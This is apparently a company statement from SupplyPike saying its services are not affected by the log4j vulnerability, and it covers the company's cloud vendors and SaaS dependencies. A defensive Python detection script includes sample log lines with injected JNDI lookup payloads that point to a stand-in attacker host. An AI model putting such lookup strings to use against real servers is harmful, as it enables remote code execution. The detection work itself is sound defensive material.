tl;dr: SupplyPike production services are not directly affected by the log4j issue.
Background
On December 9, 2021, Apache disclosed a serious security vulnerability (CVE-2021-44228) in the popular Java-based logging framework log4j2. Because of its Critical severity rating, it has been the hottest security topic of the past week. In short, an external attacker who can control the content of log messages written by log4j2 on the server side could potentially execute arbitrary Java bytecode by having the server fetch it dynamically from a remote LDAP server. Millions of corporate and government servers and services are vulnerable to this exploit given how ubiquitous the logging library is. Further analysis of the vulnerability can be found here.
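As an added illustration of the detection side (this is example code written for this post, not SupplyPike's own tooling), the script below scans log lines for the ${jndi:...} lookup strings that trigger the vulnerability and reports the scheme and host each one would contact; the sample lines and the hostnames in them are constructed, not real indicators.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Matches a log4j2 lookup of the form ${jndi:<scheme>:<target>} anywhere in a line.
# Case-insensitive because log4j2 resolves the "jndi" keyword regardless of case.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:(?P<target>[^}]*)\}",
    re.IGNORECASE,
)

@dataclass
class Finding:
    line_no: int     # 1-based index of the offending line
    scheme: str      # lookup scheme, e.g. "ldap", "ldaps", "rmi", "dns"
    target: str      # host[:port]/path the lookup would contact
    line: str        # the raw log line, kept for the incident record

def scan_log_lines(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per JNDI lookup string found in the given log lines."""
    findings: List[Finding] = []
    for line_no, line in enumerate(lines, start=1):
        for match in JNDI_LOOKUP.finditer(line):
            # Drop the "//" that URL-style targets carry so only host[:port]/path remains.
            target = match.group("target").strip().lstrip("/")
            findings.append(
                Finding(line_no, match.group("scheme").lower(), target, line.rstrip("\n"))
            )
    return findings

# Constructed sample log lines (hypothetical hosts and paths, not real indicators).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET /health HTTP/1.1" 200 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:10 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    'X-Api-Version: ${JNDI:RMI://attacker.example:1099/obj}',
]

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.scheme} lookup targeting {f.target}")
```

Any hit is worth correlating with outbound LDAP/RMI connections from the logging host, since a lookup string in a log is only an attempt until the server actually reaches out.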
SupplyPike Services
In this particular case, SupplyPike services are not directly vulnerable to the exploit. SupplyPike does not depend on log4j for logging on any of its production services. Additionally, none of our services are Java-based except for one, which was already scheduled to be sunset at the end of the year.
Dependencies
SupplyPike depends on cloud vendors to run some of our databases and workloads. AWS Elasticsearch and Qbox are two of the cloud vendors that have provided statements and patches for any potentially affected servers.
Third-party SaaS
As with any modern business, we use and depend on many third-party SaaS solutions for various business operations. We routinely monitor our SaaS partners to ensure they perform security investigations and address critical vulnerabilities.
At this point in time, we have no data or reason to believe that any of our servers or customer data have been targets of the recently disclosed log4j remote code execution vulnerability.
If you have any questions about this topic, you can contact us at security@supplypike.com.